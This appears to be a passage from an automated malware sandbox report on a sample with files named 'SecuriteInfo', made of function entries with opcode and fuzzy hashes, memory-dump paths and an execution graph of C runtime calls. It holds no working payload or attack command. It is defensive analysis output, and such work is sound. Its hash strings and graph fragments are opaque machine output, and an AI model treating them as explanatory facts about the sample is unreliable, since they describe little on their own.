                                                              • Instruction ID: 8ff93a8126b5c8ece724b24c2c68856d8b6ce9e45dbdc1ef9b925746a3f695e3
                                                              • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                              • Instruction Fuzzy Hash: C5110376504240CFCB16CF00D5C4B56BFB1FB94324F24C6A9D8090B356C33AE85ACBA1
                                                              Function 00B2D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080622726.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b2d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction ID: c40e70c46536cedf98977b3a4de377df17faa405322fce38b55344cc06396676
                                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                              • Instruction Fuzzy Hash: BE118B75504280DFDB16CF14D5C4B15BBA1FB84314F24C6ADD8494B696C33AD84ACB61
                                                              Function 00B1D745 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 575d9ba2004390c4fe462e9377df304071ca641fa2c5ce7cdcfdc7bc06a7253c
                                                              • Instruction ID: 692bf91d43d995b24286e02384035dca8969be46b8d46b8ccf6c6172ee7a5b45
                                                              • Opcode Fuzzy Hash: 575d9ba2004390c4fe462e9377df304071ca641fa2c5ce7cdcfdc7bc06a7253c
                                                              • Instruction Fuzzy Hash: 43012B711043409AE7119F15CDC4BA7FFD8DF41330F58C59AED080A2C6D6799C80C6B1
                                                              Function 00B1D744 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9600d8fc3b66538cabcb29a81c2d2215f8d6afe9f87d962d945e2085df486f3
                                                              • Instruction ID: 158c88ef71415f9342675b2fbb3f91086fcd613934ab8ec9f02af09abb6edb80
                                                              • Opcode Fuzzy Hash: f9600d8fc3b66538cabcb29a81c2d2215f8d6afe9f87d962d945e2085df486f3
                                                              • Instruction Fuzzy Hash: C6F0C2720043409AE7108F16CD88BA2FFD8EB51334F18C15AFD080A286C2799C80CAB1

                                                              Non-executed Functions

                                                              Function 05064AA0 Relevance: .5, Instructions: 482COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23a40f119943d3da5575dd85d04f4467ad6ba0bf81f3cdbdbb0655620f824788
                                                              • Instruction ID: d28703baaf3f611f6621634dc8052e67c772ef5eb0a9850ee79b941f9f7a79d4
                                                              • Opcode Fuzzy Hash: 23a40f119943d3da5575dd85d04f4467ad6ba0bf81f3cdbdbb0655620f824788
                                                              • Instruction Fuzzy Hash: E532B074A01219CFDB94DFA9C584A8EFBF2BF48311F55D195D408AB222DB34E985CFA0
                                                              Function 044F1690 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49f1e75eebe2cc702301ff0625b436c8faa4c3a07efd95864f638f8c66b9fc68
                                                              • Instruction ID: ebd63f8b8663d46e67a3db0e5cea588288d6a8f5f6b5bb912bdad2b932c5ed1c
                                                              • Opcode Fuzzy Hash: 49f1e75eebe2cc702301ff0625b436c8faa4c3a07efd95864f638f8c66b9fc68
                                                              • Instruction Fuzzy Hash: 32E1D574E102198FCB14DFA9C9809AEBBF2FF89305F24826AD514AB359D734AD41CF61
                                                              Function 044F1F00 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65d350648a285f7224216b6382d95d7d9f3d1387e72611ff93ef6c5070701971
                                                              • Instruction ID: f34f479fba8d0232f00491a3a7126ab343cda6d70b947195c14552f31a04eb2a
                                                              • Opcode Fuzzy Hash: 65d350648a285f7224216b6382d95d7d9f3d1387e72611ff93ef6c5070701971
                                                              • Instruction Fuzzy Hash: C3E1F574E002198FCB14DFA9C9809AEFBF2FF89304F24816AD914AB355D775A942CF61
                                                              Function 044F3A48 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23c9d79167cf3490aa054d17ea9d6332d65c22b4b34656d62ba4f9a0902a8a2f
                                                              • Instruction ID: 2b3b9a42480326b5b61a32a10a2d6ca48df82a6b1eb9aa7ed3701169f4dfbb23
                                                              • Opcode Fuzzy Hash: 23c9d79167cf3490aa054d17ea9d6332d65c22b4b34656d62ba4f9a0902a8a2f
                                                              • Instruction Fuzzy Hash: 81E10774E142198FCB14DFA9C9809AEFBF2FF89304F24816AD914AB356D735A941CF60
                                                              Function 044F1258 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c34b9d43e1576ae23e9fd23c4b03d47481096650b86ca930f080d2ac95bdfde4
                                                              • Instruction ID: fb66bd1c3aa330c1135407ad3e0651b073650d4aa7f855e4ce8a908efa4fa076
                                                              • Opcode Fuzzy Hash: c34b9d43e1576ae23e9fd23c4b03d47481096650b86ca930f080d2ac95bdfde4
                                                              • Instruction Fuzzy Hash: 60E1D474E042198FDB14DFA9C9809AEBBF2FF89304F24816AD515AB355DB34AD41CFA0
                                                              Function 044F1AC8 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a07650e9a548e4b12b2e1273b05e9c95fdebe96a64a034f0212170ba9d8ab91
                                                              • Instruction ID: 53f341e3f1fbc0a6c9864b4e0394efe2157fff64bc56a0ed6735beb98508cd82
                                                              • Opcode Fuzzy Hash: 1a07650e9a548e4b12b2e1273b05e9c95fdebe96a64a034f0212170ba9d8ab91
                                                              • Instruction Fuzzy Hash: B4E1F474E002198FDB14DFA9C9809AEBBF2FF89304F24816AD515AB355D734AD42CF60
                                                              Function 05068428 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 545155053dae59be47ca15a0582502704ac831f1803834cad200f75227ab4cd2
                                                              • Instruction ID: ea127e1a0584ef24eebe8ea33d161ab00ac8329ba470033598fc33f525ae594a
                                                              • Opcode Fuzzy Hash: 545155053dae59be47ca15a0582502704ac831f1803834cad200f75227ab4cd2
                                                              • Instruction Fuzzy Hash: 5DE10574E042198FCB14DFA8D5809AEBBF2FF88304F24C169E419AB356D734A941CFA1
                                                              Function 050690D8 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81426c33eed7033b45170e41812746eb2fb2ff0910b5a3ad208b8230c299532c
                                                              • Instruction ID: 8a5dd6fd0017389ebe6168c50c10f5e24e7c9e5f54f59ca4152b209537a88609
                                                              • Opcode Fuzzy Hash: 81426c33eed7033b45170e41812746eb2fb2ff0910b5a3ad208b8230c299532c
                                                              • Instruction Fuzzy Hash: 17E12874E042198FCB14DFA9D5809AEFBF2FF89304F248169E805AB356D734A941CF60
                                                              Function 05067F68 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44364ff32f2f9dc849ab87c5e41b822746fdb4600aef132e4f61b94345786e05
                                                              • Instruction ID: a2f171d9beb6e9a4330b7a9cd8d9acb5690cffd99d9b1c68c7d3a6e68886a7a2
                                                              • Opcode Fuzzy Hash: 44364ff32f2f9dc849ab87c5e41b822746fdb4600aef132e4f61b94345786e05
                                                              • Instruction Fuzzy Hash: CEE11574E042598FCB14DFA9D5809AEBBF2FF89304F24C169E419AB356D734A941CFA0
                                                              Function 05067B30 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8359c84f5f9926e10ccc40c38355e927976e5436422f72db7c429950e321ee7
                                                              • Instruction ID: b7c980657754730f213a6cbe4cc26c57c57d5b3c95ce3613676cb4246984c6e2
                                                              • Opcode Fuzzy Hash: a8359c84f5f9926e10ccc40c38355e927976e5436422f72db7c429950e321ee7
                                                              • Instruction Fuzzy Hash: FFE1F774E041598FCB14DFA9D5809AEFBF2FF89304F248169E415AB35AD734A942CFA0
                                                              Function 0232DE0C Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb2827f52a94d4f9baa993aa0a76773798d17ebd825a2124bb14bdd293ebf1db
                                                              • Instruction ID: b8b1bb829212a2d89932f62e80deb0552b0896d6d90352a8630b8a5805faa699
                                                              • Opcode Fuzzy Hash: cb2827f52a94d4f9baa993aa0a76773798d17ebd825a2124bb14bdd293ebf1db
                                                              • Instruction Fuzzy Hash: 95A17E32E002298FCF15DFB4C8845AEB7B7FF84304B1545AAE805AB265DB71E959CF80
                                                              Function 0506AC10 Relevance: .2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d6382d3123a0360650de7d532ad739a268183beeed97edd90fa6f6e36154733
                                                              • Instruction ID: 09a0c12349f83a6041855f171414eeb7d5b111e1427caf7dd7a30e7149d30b42
                                                              • Opcode Fuzzy Hash: 0d6382d3123a0360650de7d532ad739a268183beeed97edd90fa6f6e36154733
                                                              • Instruction Fuzzy Hash: BD718E74E056188FCB04DFAAD9849AEFBF2BF88311F14C166D419BB255D734A942CF50
                                                              Function 0506A980 Relevance: .1, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4eced99b4b26ef92d0b36922e13c9a069756dbd6b534946a1da42ec005777d86
                                                              • Instruction ID: a70f7cca23b666bfaf946d81d3626ca9970e39f87179239fe384ad09f8851b40
                                                              • Opcode Fuzzy Hash: 4eced99b4b26ef92d0b36922e13c9a069756dbd6b534946a1da42ec005777d86
                                                              • Instruction Fuzzy Hash: 4F519F75E016189FDB04DFEAD9446EEBBF2FF88311F10802AE919AB254DB345A46CF50
                                                              Function 0506AC00 Relevance: .1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d526909573f6c52e0ea3517b78b31f2232b6bf6fefa3143809f8bc17d4ff234a
                                                              • Instruction ID: 9151dc2465f29b97b5a07a1342d778555c133087e7cbfd17fa01da0df6657ad2
                                                              • Opcode Fuzzy Hash: d526909573f6c52e0ea3517b78b31f2232b6bf6fefa3143809f8bc17d4ff234a
                                                              • Instruction Fuzzy Hash: B5519FB5E046188FDB48DFAAD98459EFBF2FF88310F14C06AD819AB354DB349942CB40
                                                              Function 05064A91 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a32c96fba58070fa09626d08292640be19d812157b61968dd324eed36c59c11
                                                              • Instruction ID: 6a150695d3ef61a4617f3a0821d221555db9e1645fc801258b17f4afdbc7516b
                                                              • Opcode Fuzzy Hash: 7a32c96fba58070fa09626d08292640be19d812157b61968dd324eed36c59c11
                                                              • Instruction Fuzzy Hash: 2241D8B0E006188FEB58DF6AD84179EBBF2FFC8300F14C0A9D45CAB255EA345A858F51
                                                              Function 0506A972 Relevance: .1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 338c8ad6935514d3669031a3a28e896c6441727de61692f272edf4f3a5a3999c
                                                              • Instruction ID: 51a6031b3ae314328053e6a222304c1f36c94518c3ed94355ad65f35d5965d45
                                                              • Opcode Fuzzy Hash: 338c8ad6935514d3669031a3a28e896c6441727de61692f272edf4f3a5a3999c
                                                              • Instruction Fuzzy Hash: DB41A2B5E006089FDB08DFEAD98469EFBF2AF88310F14C06AD519AB255DB345946CF50

                                                              Execution Graph

                                                              Execution Coverage:2.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:2.6%
                                                              Total number of Nodes:1668
                                                              Total number of Limit Nodes:5
                                                              execution_graph 6518 10008640 6521 10008657 6518->6521 6522 10008665 6521->6522 6523 10008679 6521->6523 6526 10006368 __dosmaperr 20 API calls 6522->6526 6524 10008681 6523->6524 6525 10008693 6523->6525 6528 10006368 __dosmaperr 20 API calls 6524->6528 6532 10008652 6525->6532 6534 100054a7 6525->6534 6527 1000866a 6526->6527 6529 100062ac ___std_exception_copy 26 API calls 6527->6529 6530 10008686 6528->6530 6529->6532 6533 100062ac ___std_exception_copy 26 API calls 6530->6533 6533->6532 6535 100054ba 6534->6535 6536 100054c4 6534->6536 6535->6532 6536->6535 6537 10005af6 _abort 38 API calls 6536->6537 6538 100054e5 6537->6538 6542 10007a00 6538->6542 6543 10007a13 6542->6543 6544 100054fe 6542->6544 6543->6544 6550 10007f0f 6543->6550 6546 10007a2d 6544->6546 6547 10007a40 6546->6547 6548 10007a55 6546->6548 6547->6548 6685 10006d7e 6547->6685 6548->6535 6551 10007f1b ___DestructExceptionObject 6550->6551 6552 10005af6 _abort 38 API calls 6551->6552 6553 10007f24 6552->6553 6556 10007f72 _abort 6553->6556 6562 10005671 RtlEnterCriticalSection 6553->6562 6555 10007f42 6563 10007f86 6555->6563 6556->6544 6561 100055a8 _abort 38 API calls 6561->6556 6562->6555 6564 10007f56 6563->6564 6565 10007f94 __fassign 6563->6565 6567 10007f75 6564->6567 6565->6564 6570 10007cc2 6565->6570 6684 100056b9 RtlLeaveCriticalSection 6567->6684 6569 10007f69 6569->6556 6569->6561 6571 10007d42 6570->6571 6574 10007cd8 6570->6574 6572 10007d90 6571->6572 6575 1000571e _free 20 API calls 6571->6575 6638 10007e35 6572->6638 6574->6571 6576 10007d0b 6574->6576 6581 1000571e _free 20 API calls 6574->6581 6577 10007d64 6575->6577 6578 10007d2d 6576->6578 6583 1000571e _free 20 API calls 6576->6583 6579 1000571e _free 20 API calls 6577->6579 6580 1000571e _free 20 API calls 6578->6580 6582 10007d77 6579->6582 6585 10007d37 6580->6585 6587 10007d00 6581->6587 6584 1000571e _free 20 API calls 6582->6584 6589 10007d22 6583->6589 6590 10007d85 6584->6590 6591 1000571e _free 20 API calls 6585->6591 6586 10007dfe 6592 1000571e _free 20 API calls 6586->6592 6598 100090ba 6587->6598 6588 10007d9e 6588->6586 6596 1000571e 20 API calls _free 6588->6596 6626 100091b8 6589->6626 6595 1000571e _free 20 API calls 6590->6595 6591->6571 6597 10007e04 6592->6597 6595->6572 6596->6588 6597->6564 6599 100090cb 6598->6599 6625 100091b4 6598->6625 6600 100090dc 6599->6600 6601 1000571e _free 20 API calls 6599->6601 6602 100090ee 6600->6602 6604 1000571e _free 20 API calls 6600->6604 6601->6600 6603 10009100 6602->6603 6605 1000571e _free 20 API calls 6602->6605 6606 10009112 6603->6606 6607 1000571e _free 20 API calls 6603->6607 6604->6602 6605->6603 6608 10009124 6606->6608 6609 1000571e _free 20 API calls 6606->6609 6607->6606 6610 10009136 6608->6610 6612 1000571e _free 20 API calls 6608->6612 6609->6608 6611 10009148 6610->6611 6613 1000571e _free 20 API calls 6610->6613 6614 1000915a 6611->6614 6615 1000571e _free 20 API calls 6611->6615 6612->6610 6613->6611 6616 1000571e _free 20 API calls 6614->6616 6619 1000916c 6614->6619 6615->6614 6616->6619 6617 10009190 6622 100091a2 6617->6622 6623 1000571e _free 20 API calls 6617->6623 6618 1000917e 6618->6617 6621 1000571e _free 20 API calls 6618->6621 6619->6618 6620 1000571e _free 20 API calls 6619->6620 6620->6618 6621->6617 6624 1000571e _free 20 API calls 6622->6624 6622->6625 6623->6622 6624->6625 6625->6576 6627 100091c5 6626->6627 6637 1000921d 6626->6637 6628 1000571e _free 20 API calls 6627->6628 6629 100091d5 6627->6629 6628->6629 6630 100091e7 6629->6630 6631 1000571e _free 20 API calls 6629->6631 6632 100091f9 6630->6632 6634 1000571e _free 20 API calls 6630->6634 6631->6630 6633 1000920b 6632->6633 6635 1000571e _free 20 API calls 6632->6635 6636 1000571e _free 20 API calls 6633->6636 6633->6637 6634->6632 6635->6633 6636->6637 6637->6578 6639 10007e60 6638->6639 6640 10007e42 6638->6640 6639->6588 6640->6639 6644 1000925d 6640->6644 6643 1000571e _free 20 API calls 6643->6639 6645 10007e5a 6644->6645 6646 1000926e 6644->6646 6645->6643 6680 10009221 6646->6680 6649 10009221 __fassign 20 API calls 6650 10009281 6649->6650 6651 10009221 __fassign 20 API calls 6650->6651 6652 1000928c 6651->6652 6653 10009221 __fassign 20 API calls 6652->6653 6654 10009297 6653->6654 6655 10009221 __fassign 20 API calls 6654->6655 6656 100092a5 6655->6656 6657 1000571e _free 20 API calls 6656->6657 6658 100092b0 6657->6658 6659 1000571e _free 20 API calls 6658->6659 6660 100092bb 6659->6660 6661 1000571e _free 20 API calls 6660->6661 6662 100092c6 6661->6662 6663 10009221 __fassign 20 API calls 6662->6663 6664 100092d4 6663->6664 6665 10009221 __fassign 20 API calls 6664->6665 6666 100092e2 6665->6666 6667 10009221 __fassign 20 API calls 6666->6667 6668 100092f3 6667->6668 6669 10009221 __fassign 20 API calls 6668->6669 6670 10009301 6669->6670 6671 10009221 __fassign 20 API calls 6670->6671 6672 1000930f 6671->6672 6673 1000571e _free 20 API calls 6672->6673 6674 1000931a 6673->6674 6675 1000571e _free 20 API calls 6674->6675 6676 10009325 6675->6676 6677 1000571e _free 20 API calls 6676->6677 6678 10009330 6677->6678 6679 1000571e _free 20 API calls 6678->6679 6679->6645 6681 10009258 6680->6681 6682 10009248 6680->6682 6681->6649 6682->6681 6683 1000571e _free 20 API calls 6682->6683 6683->6682 6684->6569 6686 10006d8a ___DestructExceptionObject 6685->6686 6687 10005af6 _abort 38 API calls 6686->6687 6689 10006d94 6687->6689 6690 10006e18 _abort 6689->6690 6691 100055a8 _abort 38 API calls 6689->6691 6693 1000571e _free 20 API calls 6689->6693 6694 10005671 RtlEnterCriticalSection 6689->6694 6695 10006e0f 6689->6695 6690->6548 6691->6689 6693->6689 6694->6689 6698 100056b9 RtlLeaveCriticalSection 6695->6698 6697 10006e16 6697->6689 6698->6697 7265 10007a80 7266 10007a8d 7265->7266 7267 1000637b _abort 20 API calls 7266->7267 7268 10007aa7 7267->7268 7269 1000571e _free 20 API calls 7268->7269 7270 10007ab3 7269->7270 7271 1000637b _abort 20 API calls 7270->7271 7275 10007ad9 7270->7275 7273 10007acd 7271->7273 7272 10005eb7 11 API calls 7272->7275 7274 1000571e _free 20 API calls 7273->7274 7274->7275 7275->7272 7276 10007ae5 7275->7276 6090 10007103 GetCommandLineA GetCommandLineW 6091 10005303 6094 100050a5 6091->6094 6103 1000502f 6094->6103 6097 1000502f 5 API calls 6098 100050c3 6097->6098 6107 10005000 6098->6107 6101 10005000 20 API calls 6102 100050d9 6101->6102 6104 10005048 6103->6104 6105 10002ada _ValidateLocalCookies 5 API calls 6104->6105 6106 10005069 6105->6106 6106->6097 6108 1000502a 6107->6108 6109 1000500d 6107->6109 6108->6101 6110 10005024 6109->6110 6111 1000571e _free 20 API calls 6109->6111 6112 1000571e _free 20 API calls 6110->6112 6111->6109 6112->6108 6699 1000af43 6700 1000af59 6699->6700 6701 1000af4d 6699->6701 6701->6700 6702 1000af52 CloseHandle 6701->6702 6702->6700 6703 1000a945 6704 1000a96d 6703->6704 6705 1000a9a5 6704->6705 6706 1000a997 6704->6706 6707 1000a99e 6704->6707 6712 1000aa17 6706->6712 6716 1000aa00 6707->6716 6713 1000aa20 6712->6713 6720 1000b19b 6713->6720 6717 1000aa20 6716->6717 6718 1000b19b __startOneArgErrorHandling 21 API calls 6717->6718 6719 1000a9a3 6718->6719 6721 1000b1da __startOneArgErrorHandling 6720->6721 6723 1000b25c __startOneArgErrorHandling 6721->6723 6730 1000b59e 6721->6730 6728 1000b286 6723->6728 6733 100078a3 6723->6733 6725 1000b292 6727 10002ada _ValidateLocalCookies 5 API calls 6725->6727 6729 1000a99c 6727->6729 6728->6725 6737 1000b8b2 6728->6737 6744 1000b5c1 6730->6744 6734 100078cb 6733->6734 6735 10002ada _ValidateLocalCookies 5 API calls 6734->6735 6736 100078e8 6735->6736 6736->6728 6738 1000b8d4 6737->6738 6739 1000b8bf 6737->6739 6741 10006368 __dosmaperr 20 API calls 6738->6741 6740 1000b8d9 6739->6740 6742 10006368 __dosmaperr 20 API calls 6739->6742 6740->6725 6741->6740 6743 1000b8cc 6742->6743 6743->6725 6745 1000b5ec __raise_exc 6744->6745 6746 1000b7e5 RaiseException 6745->6746 6747 1000b5bc 6746->6747 6747->6723 7528 1000a1c6 IsProcessorFeaturePresent 7529 10007bc7 7530 10007bd3 ___DestructExceptionObject 7529->7530 7531 10007c0a _abort 7530->7531 7537 10005671 RtlEnterCriticalSection 7530->7537 7533 10007be7 7534 10007f86 __fassign 20 API calls 7533->7534 7535 10007bf7 7534->7535 7538 10007c10 7535->7538 7537->7533 7541 100056b9 RtlLeaveCriticalSection 7538->7541 7540 10007c17 7540->7531 7541->7540 6748 10005348 6749 10003529 ___vcrt_uninitialize 8 API calls 6748->6749 6750 1000534f 6749->6750 6751 10007b48 6761 10008ebf 6751->6761 6755 10007b55 6774 1000907c 6755->6774 6758 10007b7f 6759 1000571e _free 20 API calls 6758->6759 6760 10007b8a 6759->6760 6778 10008ec8 6761->6778 6763 10007b50 6764 10008fdc 6763->6764 6765 10008fe8 ___DestructExceptionObject 6764->6765 6798 10005671 RtlEnterCriticalSection 6765->6798 6767 1000905e 6812 10009073 6767->6812 6769 10008ff3 6769->6767 6771 10009032 RtlDeleteCriticalSection 6769->6771 6799 1000a09c 6769->6799 6770 1000906a _abort 6770->6755 6773 1000571e _free 20 API calls 6771->6773 6773->6769 6775 10009092 6774->6775 6776 10007b64 RtlDeleteCriticalSection 6774->6776 6775->6776 6777 1000571e _free 20 API calls 6775->6777 6776->6755 6776->6758 6777->6776 6779 10008ed4 ___DestructExceptionObject 6778->6779 6788 10005671 RtlEnterCriticalSection 6779->6788 6781 10008f77 6793 10008f97 6781->6793 6785 10008f83 _abort 6785->6763 6786 10008ee3 6786->6781 6787 10008e78 66 API calls 6786->6787 6789 10007b94 RtlEnterCriticalSection 6786->6789 6790 10008f6d 6786->6790 6787->6786 6788->6786 6789->6786 6796 10007ba8 RtlLeaveCriticalSection 6790->6796 6792 10008f75 6792->6786 6797 100056b9 RtlLeaveCriticalSection 6793->6797 6795 10008f9e 6795->6785 6796->6792 6797->6795 6798->6769 6800 1000a0a8 ___DestructExceptionObject 6799->6800 6801 1000a0b9 6800->6801 6802 1000a0ce 6800->6802 6803 10006368 __dosmaperr 20 API calls 6801->6803 6811 1000a0c9 _abort 6802->6811 6815 10007b94 RtlEnterCriticalSection 6802->6815 6805 1000a0be 6803->6805 6807 100062ac ___std_exception_copy 26 API calls 6805->6807 6806 1000a0ea 6816 1000a026 6806->6816 6807->6811 6809 1000a0f5 6832 1000a112 6809->6832 6811->6769 7080 100056b9 RtlLeaveCriticalSection 6812->7080 6814 1000907a 6814->6770 6815->6806 6817 1000a033 6816->6817 6818 1000a048 6816->6818 6819 10006368 __dosmaperr 20 API calls 6817->6819 6824 1000a043 6818->6824 6835 10008e12 6818->6835 6820 1000a038 6819->6820 6822 100062ac ___std_exception_copy 26 API calls 6820->6822 6822->6824 6824->6809 6825 1000907c 20 API calls 6826 1000a064 6825->6826 6841 10007a5a 6826->6841 6828 1000a06a 6848 1000adce 6828->6848 6831 1000571e _free 20 API calls 6831->6824 7079 10007ba8 RtlLeaveCriticalSection 6832->7079 6834 1000a11a 6834->6811 6836 10008e2a 6835->6836 6837 10008e26 6835->6837 6836->6837 6838 10007a5a 26 API calls 